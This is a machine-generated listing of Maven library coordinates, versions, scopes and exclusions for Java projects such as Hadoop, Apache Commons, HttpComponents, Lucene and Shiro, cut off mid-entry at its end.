net.bytebuddy:byte-buddy-agent 1.11.13 Scope provided|net.java.dev.jna:jna@5.8.0 Scope provided|net.java.dev.jna:jna-platform@5.8.0 Scope provided|com.google.code.findbugs:findbugs-annotations@3.0.1 net.bytebuddy:byte-buddy-parent 1.11.13 Scope provided|com.google.code.findbugs:findbugs-annotations@3.0.1 net.java.dev.jets3t:jets3t 0.9.0 commons-codec:commons-codec@1.4 commons-logging:commons-logging@1.1.1 MavenExclusions commons-codec:commons-codec,commons-logging:commons-logging|org.apache.httpcomponents:httpclient@4.1.2 MavenExclusions commons-codec:commons-codec,commons-logging:commons-logging|org.apache.httpcomponents:httpcore@4.1.2 com.jamesmurty.utils:java-xmlbuilder@0.4 net.java.dev.jna:jna 4.1.0 4.5.2 net.java.dev.jna:jna-platform 4.1.0 net.java.dev.jna:jna@4.1.0 net.java:jvnet-parent 1 3 4 5 net.sf.ehcache:ehcache-core 2.4.4 org.slf4j:slf4j-api@1.6.1 Scope provided|org.slf4j:slf4j-jdk14@1.6.1 Scope provided|javax.servlet:servlet-api@2.4 Scope provided MavenExclusions javax.transaction:jta,javax.security:jacc,net.sf.ehcache:ehcache|org.hibernate:hibernate-core@3.5.1-Final Scope provided|javax.transaction:jta@1.1 net.sf.ehcache:ehcache-parent 2.2 net.sourceforge.cssparser:cssparser 0.9.16 org.w3c.css:sac@1.3 net.sourceforge.htmlunit:htmlunit 2.18 MavenExclusions xerces:xercesImpl|xalan:xalan@2.7.2 commons-collections:commons-collections@3.2.1 org.apache.commons:commons-lang3@3.4 org.apache.httpcomponents:httpclient@4.5 org.apache.httpcomponents:httpmime@4.5 commons-codec:commons-codec@1.10 net.sourceforge.htmlunit:htmlunit-core-js@2.17 xerces:xercesImpl@2.11.0 MavenExclusions xerces:xercesImpl|net.sourceforge.nekohtml:nekohtml@1.9.22 net.sourceforge.cssparser:cssparser@0.9.16 commons-io:commons-io@2.4 commons-logging:commons-logging@1.2 org.eclipse.jetty.websocket:websocket-client@9.2.12.v20150709 2.37.0 MavenExclusions xerces:xercesImpl,xml-apis:xml-apis|xalan:xalan@2.7.2 org.apache.commons:commons-lang3@3.9 MavenExclusions org.apache.commons:commons-lang3|org.apache.commons:commons-text@1.8 org.apache.httpcomponents:httpmime@4.5.11 net.sourceforge.htmlunit:htmlunit-core-js@2.37.0 net.sourceforge.htmlunit:neko-htmlunit@2.37.0 net.sourceforge.htmlunit:htmlunit-cssparser@1.5.0 commons-io:commons-io@2.6 commons-logging:commons-logging@1.2 commons-net:commons-net@3.6 org.brotli:dec@0.1.2 org.eclipse.jetty.websocket:websocket-client@9.4.26.v20200117 net.sourceforge.htmlunit:htmlunit-core-js 2.17 2.37.0 net.sourceforge.htmlunit:htmlunit-cssparser 1.5.0 net.sourceforge.htmlunit:neko-htmlunit 2.37.0 xerces:xercesImpl@2.12.0 2.61.0 xerces:xercesImpl@2.12.2 net.sourceforge.nekohtml:nekohtml 1.9.22 xerces:xercesImpl@2.11.0 org.apache.avro:avro 1.7.4 org.codehaus.jackson:jackson-core-asl@1.8.8 org.codehaus.jackson:jackson-mapper-asl@1.8.8 com.thoughtworks.paranamer:paranamer@2.3 org.xerial.snappy:snappy-java@1.0.4.1 org.apache.commons:commons-compress@1.4.1 org.slf4j:slf4j-api@1.6.4 Opt Scope runtime|org.slf4j:slf4j-simple@1.6.4 org.apache.avro:avro-parent 1.7.4 org.slf4j:slf4j-api@1.6.4 Opt Scope runtime|org.slf4j:slf4j-simple@1.6.4 org.apache.avro:avro-toplevel 1.7.4 org.apache.commons:commons-compress 1.21 Opt|com.github.luben:zstd-jni@1.5.0-2 Opt|org.brotli:dec@0.1.2 Opt|org.tukaani:xz@1.9 Opt|asm:asm@3.2 Scope provided|org.osgi:org.osgi.core@6.0.0 1.26.0 Opt|com.github.luben:zstd-jni@1.5.5-11 Opt|org.brotli:dec@0.1.2 Opt|org.tukaani:xz@1.9 Opt|commons-codec:commons-codec@1.16.1 Opt|org.ow2.asm:asm@9.6 commons-io:commons-io@2.15.1 org.apache.commons:commons-lang3@3.14.0 Scope provided|org.osgi:org.osgi.core@6.0.0 org.apache.commons:commons-configuration2 2.8.0 org.apache.commons:commons-lang3@3.12.0 org.apache.commons:commons-text@1.9 MavenExclusions logkit:logkit,avalon-framework:avalon-framework|commons-logging:commons-logging@1.2 Opt|commons-beanutils:commons-beanutils@1.9.4 Opt|commons-codec:commons-codec@1.15 Opt|org.apache.commons:commons-jexl@2.1.1 Opt|org.apache.commons:commons-vfs2@2.9.0 Opt MavenExclusions xerces:xerces,ant:ant-optional|commons-jxpath:commons-jxpath@1.3 Opt|xml-resolver:xml-resolver@1.2 Opt|org.springframework:spring-core@5.3.21 Opt|org.springframework:spring-beans@5.3.21 Scope provided|javax.servlet:servlet-api@2.5 Opt|org.yaml:snakeyaml@1.30 Opt|com.fasterxml.jackson.core:jackson-databind@2.13.3 Opt|log4j:log4j@1.2.17 2.10.1 org.apache.commons:commons-lang3@3.14.0 org.apache.commons:commons-text@1.11.0 MavenExclusions logkit:logkit,avalon-framework:avalon-framework|commons-logging:commons-logging@1.3.0 Opt|commons-beanutils:commons-beanutils@1.9.4 Opt|commons-codec:commons-codec@1.16.1 Opt|org.apache.commons:commons-jexl@2.1.1 Opt|org.apache.commons:commons-vfs2@2.9.0 Opt MavenExclusions xerces:xerces,ant:ant-optional|commons-jxpath:commons-jxpath@1.3 Opt|xml-resolver:xml-resolver@1.2 Opt MavenExclusions org.springframework:spring-jcl|org.springframework:spring-core@5.3.33 Opt|org.springframework:spring-beans@5.3.33 Opt Scope provided|javax.servlet:servlet-api@2.5 Opt|org.yaml:snakeyaml@2.2 Opt|com.fasterxml.jackson.core:jackson-databind@2.17.0 Opt|org.apache.logging.log4j:log4j-1.2-api@2.23.1 Opt|org.apache.logging.log4j:log4j-core@2.23.1 org.apache.commons:commons-exec 1.3 org.apache.commons:commons-lang3 3.4 3.12.0 3.18.0 org.apache.commons:commons-math3 3.1.1 3.6.1 org.apache.commons:commons-parent 9 17 23 24 25 28 34 35 37 39 42 47 50 52 53 54 62 66 67 81 84 85 org.apache.commons:commons-pool2 2.3 Opt|cglib:cglib@3.1 Opt|org.ow2.asm:asm-util@5.0.3 org.apache.commons:commons-text 1.10.0 org.apache.commons:commons-lang3@3.12.0 org.apache.commons:commons-vfs2 2.6.0 commons-logging:commons-logging@1.2 Opt|ant:ant@1.6.5 Opt|commons-net:commons-net@3.6 Opt|org.apache.commons:commons-compress@1.19 Opt|org.apache.commons:commons-collections4@4.4 org.apache.hadoop:hadoop-hdfs-client@3.2.1 Opt MavenExclusions *:*|org.apache.hadoop:hadoop-common@3.2.1 Opt MavenExclusions *:*|org.apache.hadoop:hadoop-hdfs@3.2.1 Opt|commons-httpclient:commons-httpclient@3.1 Opt|org.apache.httpcomponents:httpclient@4.5.10 Opt|org.apache.httpcomponents.client5:httpclient5@5.0-beta6 Opt|com.jcraft:jsch@0.1.55 2.10.0 commons-logging:commons-logging@1.3.4 Opt|commons-net:commons-net@3.11.1 Opt|org.apache.commons:commons-compress@1.27.1 Opt|org.apache.commons:commons-collections4@4.5.0-M3 Opt|commons-httpclient:commons-httpclient@3.1 Opt|org.apache.httpcomponents:httpclient@4.5.14 Opt|org.apache.httpcomponents.core5:httpcore5@5.3.3 Opt|org.apache.httpcomponents.client5:httpclient5@5.4.1 Opt|com.jcraft:jsch@0.1.55 org.apache.commons:commons-lang3@3.17.0 commons-io:commons-io@2.18.0 org.apache.commons:commons-vfs2-jackrabbit1 2.6.0 org.apache.commons:commons-vfs2@2.6.0 commons-logging:commons-logging@1.2 commons-httpclient:commons-httpclient@3.1 org.apache.httpcomponents:httpclient@4.5.10 org.apache.jackrabbit:jackrabbit-webdav@1.6.5 org.apache.commons:commons-vfs2-project 2.6.0 2.10.0 org.apache.curator:apache-curator 2.7.1 MavenExclusions com.sun.jmx:jmxri,com.sun.jdmk:jmxtools,javax.jms:jms,junit:junit,org.slf4j:slf4j-log4j12|org.apache.zookeeper:zookeeper@3.4.6 com.google.guava:guava@16.0.1 org.apache.curator:curator-client 2.7.1 org.slf4j:slf4j-api@1.7.6 MavenExclusions com.sun.jmx:jmxri,com.sun.jdmk:jmxtools,javax.jms:jms,junit:junit,org.slf4j:slf4j-log4j12|org.apache.zookeeper:zookeeper@3.4.6 com.google.guava:guava@16.0.1 org.apache.curator:curator-framework 2.7.1 org.apache.curator:curator-client@2.7.1 MavenExclusions com.sun.jmx:jmxri,com.sun.jdmk:jmxtools,javax.jms:jms,junit:junit,org.slf4j:slf4j-log4j12|org.apache.zookeeper:zookeeper@3.4.6 com.google.guava:guava@16.0.1 org.apache.curator:curator-recipes 2.7.1 org.apache.curator:curator-framework@2.7.1 MavenExclusions com.sun.jmx:jmxri,com.sun.jdmk:jmxtools,javax.jms:jms,junit:junit,org.slf4j:slf4j-log4j12|org.apache.zookeeper:zookeeper@3.4.6 com.google.guava:guava@16.0.1 org.apache.directory.api:api-asn1-api 1.0.0-M20 org.apache.directory.api:api-i18n@1.0.0-M20 Scope provided|findbugs:annotations@1.0.0 org.slf4j:slf4j-api@1.7.5 org.apache.directory.api:api-asn1-ber 1.0.0-M20 org.apache.directory.api:api-i18n@1.0.0-M20 org.apache.directory.api:api-asn1-api@1.0.0-M20 org.apache.directory.api:api-util@1.0.0-M20 Scope provided|findbugs:annotations@1.0.0 org.slf4j:slf4j-api@1.7.5 org.apache.directory.api:api-asn1-parent 1.0.0-M20 Scope provided|findbugs:annotations@1.0.0 org.slf4j:slf4j-api@1.7.5 org.apache.directory.api:api-i18n 1.0.0-M20 Scope provided|findbugs:annotations@1.0.0 org.slf4j:slf4j-api@1.7.5 org.apache.directory.api:api-ldap-model 1.0.0-M20 org.apache.directory.api:api-util@1.0.0-M20 org.apache.directory.api:api-asn1-api@1.0.0-M20 org.apache.directory.api:api-asn1-ber@1.0.0-M20 org.apache.directory.api:api-i18n@1.0.0-M20 org.apache.mina:mina-core@2.0.7 antlr:antlr@2.7.7 commons-lang:commons-lang@2.6 commons-collections:commons-collections@3.2.1 Scope provided|findbugs:annotations@1.0.0 org.slf4j:slf4j-api@1.7.5 1.0.0-M31 org.apache.directory.api:api-util@1.0.0-M31 org.apache.directory.api:api-asn1-api@1.0.0-M31 org.apache.directory.api:api-asn1-ber@1.0.0-M31 org.apache.directory.api:api-i18n@1.0.0-M31 org.apache.mina:mina-core@2.0.9 Scope provided|antlr:antlr@2.7.7 org.apache.servicemix.bundles:org.apache.servicemix.bundles.antlr@2.7.7_5 commons-lang:commons-lang@2.6 commons-collections:commons-collections@3.2.1 Scope provided|findbugs:annotations@1.0.0 org.apache.directory.api:api-ldap-parent 1.0.0-M20 Scope provided|findbugs:annotations@1.0.0 org.slf4j:slf4j-api@1.7.5 1.0.0-M31 org.apache.directory.api:api-parent 1.0.0-M20 Scope provided|findbugs:annotations@1.0.0 org.slf4j:slf4j-api@1.7.5 1.0.0-M31 org.apache.directory.api:api-util 1.0.0-M20 org.apache.directory.api:api-i18n@1.0.0-M20 Scope provided|findbugs:annotations@1.0.0 org.slf4j:slf4j-api@1.7.5 org.apache.directory.project:project 31 34 org.apache.directory.server:apacheds-i18n 2.0.0-M15 Scope provided|findbugs:annotations@1.0.0 org.slf4j:slf4j-api@1.7.5 org.apache.directory.server:apacheds-kerberos-codec 2.0.0-M15 org.apache.directory.server:apacheds-i18n@2.0.0-M15 org.apache.directory.api:api-asn1-api@1.0.0-M20 org.apache.directory.api:api-asn1-ber@1.0.0-M20 org.apache.directory.api:api-i18n@1.0.0-M20 org.apache.directory.api:api-ldap-model@1.0.0-M20 org.apache.directory.api:api-util@1.0.0-M20 net.sf.ehcache:ehcache-core@2.4.4 Scope provided|findbugs:annotations@1.0.0 org.slf4j:slf4j-api@1.7.5 org.apache.directory.server:apacheds-parent 2.0.0-M15 Scope provided|findbugs:annotations@1.0.0 org.slf4j:slf4j-api@1.7.5 org.apache.hadoop:hadoop-annotations 2.7.7 Scope provided|jdiff:jdiff@1.0.9 org.apache.hadoop:hadoop-auth 2.7.7 Scope provided|org.apache.hadoop:hadoop-annotations@2.7.7 Scope provided|javax.servlet:servlet-api@2.5 org.slf4j:slf4j-api@1.7.10 commons-codec:commons-codec@1.4 Scope runtime MavenExclusions com.sun.jdmk:jmxtools,com.sun.jmx:jmxri,javax.mail:mail,javax.jms:jmx,javax.jms:jms|log4j:log4j@1.2.17 Scope runtime|org.slf4j:slf4j-log4j12@1.7.10 org.apache.httpcomponents:httpclient@4.2.5 MavenExclusions org.apache.directory.api:api-asn1-ber,org.apache.directory.api:api-i18n,org.apache.directory.api:api-ldap-model,net.sf.ehcache:ehcache-core|org.apache.directory.server:apacheds-kerberos-codec@2.0.0-M15 MavenExclusions junit:junit,com.sun.jdmk:jmxtools,com.sun.jmx:jmxri,org.jboss.netty:netty|org.apache.zookeeper:zookeeper@3.4.6 org.apache.curator:curator-framework@2.7.1 org.apache.hadoop:hadoop-client-api 3.2.4 org.apache.hadoop:hadoop-client-runtime 3.2.4 Scope runtime|org.apache.hadoop:hadoop-client-api@3.2.4 Scope runtime|org.apache.htrace:htrace-core4@4.1.0-incubating Scope runtime|org.slf4j:slf4j-api@1.7.35 Scope runtime MavenExclusions avalon-framework:avalon-framework,logkit:logkit,javax.servlet:javax.servlet-api|commons-logging:commons-logging@1.1.3 Scope runtime|com.google.code.findbugs:jsr305@3.0.2 Opt Scope runtime MavenExclusions com.sun.jdmk:jmxtools,com.sun.jmx:jmxri,javax.mail:mail,javax.jms:jmx,javax.jms:jms|ch.qos.reload4j:reload4j@1.2.18.3 org.apache.hadoop:hadoop-common 2.7.7 org.apache.hadoop:hadoop-annotations@2.7.7 com.google.guava:guava@11.0.2 commons-cli:commons-cli@1.2 org.apache.commons:commons-math3@3.1.1 xmlenc:xmlenc@0.52 commons-httpclient:commons-httpclient@3.1 commons-codec:commons-codec@1.4 commons-io:commons-io@2.4 commons-net:commons-net@3.1 commons-collections:commons-collections@3.2.2 javax.servlet:servlet-api@2.5 MavenExclusions org.mortbay.jetty:servlet-api|org.mortbay.jetty:jetty@6.1.26 org.mortbay.jetty:jetty-util@6.1.26 org.mortbay.jetty:jetty-sslengine@6.1.26 Scope runtime|javax.servlet.jsp:jsp-api@2.1 com.sun.jersey:jersey-core@1.9 MavenExclusions stax:stax-api|com.sun.jersey:jersey-json@1.9 com.sun.jersey:jersey-server@1.9 MavenExclusions avalon-framework:avalon-framework,logkit:logkit,javax.servlet:servlet-api|commons-logging:commons-logging@1.1.3 MavenExclusions com.sun.jdmk:jmxtools,com.sun.jmx:jmxri,javax.mail:mail,javax.jms:jmx,javax.jms:jms|log4j:log4j@1.2.17 net.java.dev.jets3t:jets3t@0.9.0 commons-lang:commons-lang@2.6 commons-configuration:commons-configuration@1.6 org.slf4j:slf4j-api@1.7.10 Scope runtime|org.slf4j:slf4j-log4j12@1.7.10 org.codehaus.jackson:jackson-core-asl@1.9.13 org.codehaus.jackson:jackson-mapper-asl@1.9.13 org.apache.avro:avro@1.7.4 Scope provided|org.apache.ant:ant@1.8.1 com.google.protobuf:protobuf-java@2.5.0 com.google.code.gson:gson@2.2.4 org.apache.hadoop:hadoop-auth@2.7.7 com.jcraft:jsch@0.1.54 org.apache.curator:curator-client@2.7.1 org.apache.curator:curator-recipes@2.7.1 com.google.code.findbugs:jsr305@3.0.0 org.apache.htrace:htrace-core@3.1.0-incubating MavenExclusions jline:jline,org.jboss.netty:netty,junit:junit,com.sun.jdmk:jmxtools,com.sun.jmx:jmxri|org.apache.zookeeper:zookeeper@3.4.6 org.apache.commons:commons-compress@1.4.1 org.apache.hadoop:hadoop-hdfs 2.7.7 Scope provided|org.apache.hadoop:hadoop-annotations@2.7.7 Scope provided|org.apache.hadoop:hadoop-auth@2.7.7 Scope provided|org.apache.hadoop:hadoop-common@2.7.7 com.google.guava:guava@11.0.2 MavenExclusions org.mortbay.jetty:servlet-api|org.mortbay.jetty:jetty@6.1.26 org.mortbay.jetty:jetty-util@6.1.26 com.sun.jersey:jersey-core@1.9 com.sun.jersey:jersey-server@1.9 commons-cli:commons-cli@1.2 commons-codec:commons-codec@1.4 commons-io:commons-io@2.4 commons-lang:commons-lang@2.6 MavenExclusions avalon-framework:avalon-framework,logkit:logkit,javax.servlet:servlet-api|commons-logging:commons-logging@1.1.3 commons-daemon:commons-daemon@1.0.13 MavenExclusions com.sun.jdmk:jmxtools,com.sun.jmx:jmxri,javax.mail:mail,javax.jms:jmx,javax.jms:jms|log4j:log4j@1.2.17 com.google.protobuf:protobuf-java@2.5.0 javax.servlet:servlet-api@2.5 Scope provided|org.slf4j:slf4j-log4j12@1.7.10 org.codehaus.jackson:jackson-core-asl@1.9.13 org.codehaus.jackson:jackson-mapper-asl@1.9.13 xmlenc:xmlenc@0.52 io.netty:netty@3.6.2.Final io.netty:netty-all@4.0.23.Final xerces:xercesImpl@2.9.1 org.apache.htrace:htrace-core@3.1.0-incubating org.fusesource.leveldbjni:leveldbjni-all@1.8 org.apache.hadoop:hadoop-main 2.7.7 3.2.4 org.apache.hadoop:hadoop-project 2.7.7 3.2.4 org.apache.hadoop:hadoop-project-dist 2.7.7 Scope provided|org.apache.hadoop:hadoop-annotations@2.7.7 org.apache.hadoop:hadoop-yarn 2.7.7 org.apache.hadoop:hadoop-yarn-api 2.7.7 commons-lang:commons-lang@2.6 com.google.guava:guava@11.0.2 MavenExclusions avalon-framework:avalon-framework,logkit:logkit,javax.servlet:servlet-api|commons-logging:commons-logging@1.1.3 Scope provided|org.apache.hadoop:hadoop-common@2.7.7 org.apache.hadoop:hadoop-annotations@2.7.7 com.google.protobuf:protobuf-java@2.5.0 org.apache.hadoop:hadoop-yarn-client 2.7.7 Scope provided|org.apache.hadoop:hadoop-common@2.7.7 com.google.guava:guava@11.0.2 MavenExclusions avalon-framework:avalon-framework,logkit:logkit,javax.servlet:servlet-api|commons-logging:commons-logging@1.1.3 commons-lang:commons-lang@2.6 commons-cli:commons-cli@1.2 MavenExclusions com.sun.jdmk:jmxtools,com.sun.jmx:jmxri,javax.mail:mail,javax.jms:jmx,javax.jms:jms|log4j:log4j@1.2.17 org.apache.hadoop:hadoop-annotations@2.7.7 org.apache.hadoop:hadoop-yarn-api@2.7.7 org.apache.hadoop:hadoop-yarn-common@2.7.7 org.apache.hadoop:hadoop-yarn-common 2.7.7 Scope provided|org.apache.hadoop:hadoop-common@2.7.7 org.apache.hadoop:hadoop-yarn-api@2.7.7 javax.xml.bind:jaxb-api@2.2.2 org.apache.commons:commons-compress@1.4.1 commons-lang:commons-lang@2.6 javax.servlet:servlet-api@2.5 commons-codec:commons-codec@1.4 org.mortbay.jetty:jetty-util@6.1.26 com.sun.jersey:jersey-core@1.9 com.sun.jersey:jersey-client@1.9 org.codehaus.jackson:jackson-core-asl@1.9.13 org.codehaus.jackson:jackson-mapper-asl@1.9.13 org.codehaus.jackson:jackson-jaxrs@1.9.13 org.codehaus.jackson:jackson-xc@1.9.13 com.google.guava:guava@11.0.2 MavenExclusions avalon-framework:avalon-framework,logkit:logkit,javax.servlet:servlet-api|commons-logging:commons-logging@1.1.3 commons-cli:commons-cli@1.2 org.slf4j:slf4j-api@1.7.10 org.apache.hadoop:hadoop-annotations@2.7.7 com.google.inject.extensions:guice-servlet@3.0 com.google.protobuf:protobuf-java@2.5.0 commons-io:commons-io@2.4 com.google.inject:guice@3.0 com.sun.jersey:jersey-server@1.9 MavenExclusions stax:stax-api|com.sun.jersey:jersey-json@1.9 com.sun.jersey.contribs:jersey-guice@1.9 MavenExclusions com.sun.jdmk:jmxtools,com.sun.jmx:jmxri,javax.mail:mail,javax.jms:jmx,javax.jms:jms|log4j:log4j@1.2.17 org.apache.hadoop:hadoop-yarn-server-tests 2.7.7 Scope provided|org.apache.hadoop:hadoop-common@2.7.7 org.apache.hadoop:hadoop-annotations@2.7.7 org.apache.hadoop:hadoop-yarn-server-common@2.7.7 org.apache.hadoop:hadoop-yarn-server-nodemanager@2.7.7 org.apache.hadoop:hadoop-yarn-server-resourcemanager@2.7.7 org.apache.hadoop:hadoop-yarn-common@2.7.7 org.apache.hadoop:hadoop-yarn-api@2.7.7 com.google.guava:guava@11.0.2 MavenExclusions avalon-framework:avalon-framework,logkit:logkit,javax.servlet:servlet-api|commons-logging:commons-logging@1.1.3 org.apache.htrace:htrace 3.1.0-incubating 4.1.0-incubating org.apache.htrace:htrace-core 3.1.0-incubating org.apache.htrace:htrace-core4 4.1.0-incubating org.apache.httpcomponents:httpasyncclient 4.0.2 org.apache.httpcomponents:httpcore@4.3.2 org.apache.httpcomponents:httpcore-nio@4.3.2 org.apache.httpcomponents:httpclient@4.3.5 commons-logging:commons-logging@1.1.3 org.apache.httpcomponents:httpclient 4.5.1 org.apache.httpcomponents:httpcore@4.4.3 commons-logging:commons-logging@1.2 commons-codec:commons-codec@1.9 4.5.13 org.apache.httpcomponents:httpcore@4.4.13 commons-logging:commons-logging@1.2 commons-codec:commons-codec@1.11 org.apache.httpcomponents:httpcomponents-asyncclient 4.0.2 org.apache.httpcomponents:httpcomponents-client 4.5 4.5.1 4.5.11 4.5.13 org.apache.httpcomponents:httpcomponents-core 4.3.2 4.4.1 4.4.3 4.4.13 org.apache.httpcomponents:httpcomponents-parent 11 org.apache.httpcomponents:httpcore 4.4.1 4.4.3 4.4.13 org.apache.httpcomponents:httpcore-nio 4.3.2 org.apache.httpcomponents:httpcore@4.3.2 org.apache.httpcomponents:httpmime 4.5 org.apache.httpcomponents:httpclient@4.5 4.5.11 org.apache.httpcomponents:httpclient@4.5.11 org.apache.httpcomponents:project 7 org.apache.jackrabbit:jackrabbit-jcr-commons 1.6.5 Scope provided|javax.jcr:jcr@1.0 2.22.2 Scope provided|javax.jcr:jcr@2.0 Opt|org.apache.jackrabbit:oak-jackrabbit-api@1.22.22 Scope provided|org.osgi:org.osgi.annotation@6.0.0 org.apache.jackrabbit:jackrabbit-parent 1.6.5 2.22.2 org.apache.jackrabbit:jackrabbit-webdav 1.6.5 org.apache.jackrabbit:jackrabbit-jcr-commons@1.6.5 org.slf4j:slf4j-api@1.5.3 Scope provided|javax.servlet:servlet-api@2.3 MavenExclusions junit:junit|commons-httpclient:commons-httpclient@3.0 org.apache.jackrabbit:parent 5 org.apache.logging.log4j:log4j-bom 2.24.3 org.apache.logging:logging-parent 11.3.0 org.apache.lucene:lucene-analyzers-common 8.7.0 org.apache.lucene:lucene-core@8.7.0 org.apache.lucene:lucene-core 8.7.0 org.apache.lucene:lucene-highlighter 8.7.0 org.apache.lucene:lucene-core@8.7.0 MavenExclusions org.apache.lucene:lucene-core|org.apache.lucene:lucene-memory@8.7.0 MavenExclusions org.apache.lucene:lucene-core|org.apache.lucene:lucene-queries@8.7.0 org.apache.lucene:lucene-memory 8.7.0 org.apache.lucene:lucene-core@8.7.0 org.apache.lucene:lucene-parent 8.7.0 org.apache.lucene:lucene-queries 8.7.0 org.apache.lucene:lucene-core@8.7.0 org.apache.lucene:lucene-queryparser 8.7.0 org.apache.lucene:lucene-core@8.7.0 MavenExclusions org.apache.lucene:lucene-core|org.apache.lucene:lucene-queries@8.7.0 MavenExclusions org.apache.lucene:lucene-core|org.apache.lucene:lucene-sandbox@8.7.0 org.apache.lucene:lucene-sandbox 8.7.0 org.apache.lucene:lucene-core@8.7.0 org.apache.lucene:lucene-solr-grandparent 8.7.0 org.apache.maven.plugin-tools:maven-plugin-annotations 3.7.0 org.apache.maven.resolver:maven-resolver 1.4.1 org.apache.maven.resolver:maven-resolver-api 1.4.1 org.apache.maven.resolver:maven-resolver-connector-basic 1.4.1 org.apache.maven.resolver:maven-resolver-api@1.4.1 org.apache.maven.resolver:maven-resolver-spi@1.4.1 org.apache.maven.resolver:maven-resolver-util@1.4.1 Opt Scope provided|javax.inject:javax.inject@1 org.slf4j:slf4j-api@1.7.25 org.apache.maven.resolver:maven-resolver-impl 1.4.1 org.apache.maven.resolver:maven-resolver-api@1.4.1 org.apache.maven.resolver:maven-resolver-spi@1.4.1 org.apache.maven.resolver:maven-resolver-util@1.4.1 Opt Scope provided|javax.inject:javax.inject@1 Opt Scope provided|org.eclipse.sisu:org.eclipse.sisu.inject@0.3.3 Opt Scope provided MavenClassifier no_aop MavenExclusions aopalliance:aopalliance,com.google.code.findbugs:jsr305|org.sonatype.sisu:sisu-guice@3.2.6 org.slf4j:slf4j-api@1.7.25 org.apache.maven.resolver:maven-resolver-spi 1.4.1 org.apache.maven.resolver:maven-resolver-api@1.4.1 org.apache.maven.resolver:maven-resolver-transport-file 1.4.1 org.apache.maven.resolver:maven-resolver-api@1.4.1 org.apache.maven.resolver:maven-resolver-spi@1.4.1 Opt Scope provided|javax.inject:javax.inject@1 org.slf4j:slf4j-api@1.7.25 org.apache.maven.resolver:maven-resolver-transport-http 1.4.1 org.apache.maven.resolver:maven-resolver-api@1.4.1 org.apache.maven.resolver:maven-resolver-spi@1.4.1 org.apache.maven.resolver:maven-resolver-util@1.4.1 MavenExclusions commons-logging:commons-logging|org.apache.httpcomponents:httpclient@4.5.6 org.apache.httpcomponents:httpcore@4.4.10 Scope runtime|org.slf4j:jcl-over-slf4j@1.7.25 Opt Scope provided|javax.inject:javax.inject@1 org.slf4j:slf4j-api@1.7.25 org.apache.maven.resolver:maven-resolver-util 1.4.1 org.apache.maven.resolver:maven-resolver-api@1.4.1 org.apache.maven:maven 3.6.3 org.apache.maven:maven-artifact 3.6.3 org.codehaus.plexus:plexus-utils@3.2.1 org.apache.commons:commons-lang3@3.8.1 org.apache.maven:maven-builder-support 3.6.3 org.apache.maven:maven-model 3.6.3 org.codehaus.plexus:plexus-utils@3.2.1 org.apache.maven:maven-model-builder 3.6.3 org.codehaus.plexus:plexus-utils@3.2.1 org.codehaus.plexus:plexus-interpolation@1.25 javax.inject:javax.inject@1 org.apache.maven:maven-model@3.6.3 org.apache.maven:maven-artifact@3.6.3 org.apache.maven:maven-builder-support@3.6.3 org.eclipse.sisu:org.eclipse.sisu.inject@0.3.4 org.apache.maven:maven-parent 33 org.apache.maven:maven-plugin-api 3.6.3 org.apache.maven:maven-model@3.6.3 MavenExclusions org.apache.maven.wagon:wagon-provider-api|org.apache.maven:maven-artifact@3.6.3 org.eclipse.sisu:org.eclipse.sisu.plexus@0.3.4 org.codehaus.plexus:plexus-utils@3.2.1 org.codehaus.plexus:plexus-classworlds@2.6.0 org.apache.maven:maven-repository-metadata 3.6.3 org.codehaus.plexus:plexus-utils@3.2.1 org.apache.maven:maven-resolver-provider 3.6.3 org.apache.maven:maven-model@3.6.3 org.apache.maven:maven-model-builder@3.6.3 org.apache.maven:maven-repository-metadata@3.6.3 org.apache.maven.resolver:maven-resolver-api@1.4.1 org.apache.maven.resolver:maven-resolver-spi@1.4.1 org.apache.maven.resolver:maven-resolver-util@1.4.1 org.apache.maven.resolver:maven-resolver-impl@1.4.1 org.codehaus.plexus:plexus-utils@3.2.1 javax.inject:javax.inject@1 Opt MavenClassifier no_aop MavenExclusions aopalliance:aopalliance|com.google.inject:guice@4.2.1 org.slf4j:slf4j-api@1.7.29 org.apache.mina:mina-core 2.0.7 org.slf4j:slf4j-api@1.6.6 2.0.9 org.slf4j:slf4j-api@1.7.7 2.0.21 org.slf4j:slf4j-api@1.7.26 2.0.22 org.slf4j:slf4j-api@1.7.26 2.0.27 org.slf4j:slf4j-api@1.7.36 org.apache.mina:mina-parent 2.0.7 org.slf4j:slf4j-api@1.6.6 2.0.9 org.slf4j:slf4j-api@1.7.7 2.0.21 org.slf4j:slf4j-api@1.7.26 2.0.22 org.slf4j:slf4j-api@1.7.26 2.0.27 org.slf4j:slf4j-api@1.7.36 org.apache.pdfbox:fontbox 2.0.16 commons-logging:commons-logging@1.2 2.0.23 commons-logging:commons-logging@1.2 2.0.24 commons-logging:commons-logging@1.2 org.apache.pdfbox:pdfbox 2.0.16 org.apache.pdfbox:fontbox@2.0.16 commons-logging:commons-logging@1.2 Opt|org.bouncycastle:bcmail-jdk15on@1.60 Opt|org.bouncycastle:bcprov-jdk15on@1.60 2.0.23 org.apache.pdfbox:fontbox@2.0.23 commons-logging:commons-logging@1.2 Opt|org.bouncycastle:bcmail-jdk15on@1.64 Opt|org.bouncycastle:bcprov-jdk15on@1.64 2.0.24 org.apache.pdfbox:fontbox@2.0.24 commons-logging:commons-logging@1.2 Opt|org.bouncycastle:bcmail-jdk15on@1.64 Opt|org.bouncycastle:bcprov-jdk15on@1.64 org.apache.pdfbox:pdfbox-parent 2.0.16 2.0.23 2.0.24 org.apache.pdfbox:xmpbox 2.0.16 commons-logging:commons-logging@1.2 org.apache.servicemix.bundles:bundles-pom 6 org.apache.servicemix.bundles:org.apache.servicemix.bundles.antlr 2.7.7_5 org.apache.servicemix:servicemix-pom 5 org.apache.shiro:shiro-cache 1.10.0 org.apache.shiro:shiro-lang@1.10.0 1.13.0 org.apache.shiro:shiro-lang@1.13.0 org.apache.shiro:shiro-config 1.10.0 1.13.0 org.apache.shiro:shiro-config-core 1.10.0 org.apache.shiro:shiro-lang@1.10.0 org.apache.shiro:shiro-config-ogdl 1.10.0 org.apache.shiro:shiro-lang@1.10.0 org.apache.shiro:shiro-config-core@1.10.0 org.apache.shiro:shiro-event@1.10.0 MavenExclusions commons-logging:commons-logging|commons-beanutils:commons-beanutils@1.9.4 Opt MavenExclusions commons-logging:commons-logging|org.apache.commons:commons-configuration2@2.8.0 org.slf4j:slf4j-api@1.7.36 1.13.0 org.apache.shiro:shiro-lang@1.13.0 org.apache.shiro:shiro-config-core@1.13.0 org.apache.shiro:shiro-event@1.13.0 MavenExclusions commons-logging:commons-logging|commons-beanutils:commons-beanutils@1.9.4 Opt MavenExclusions 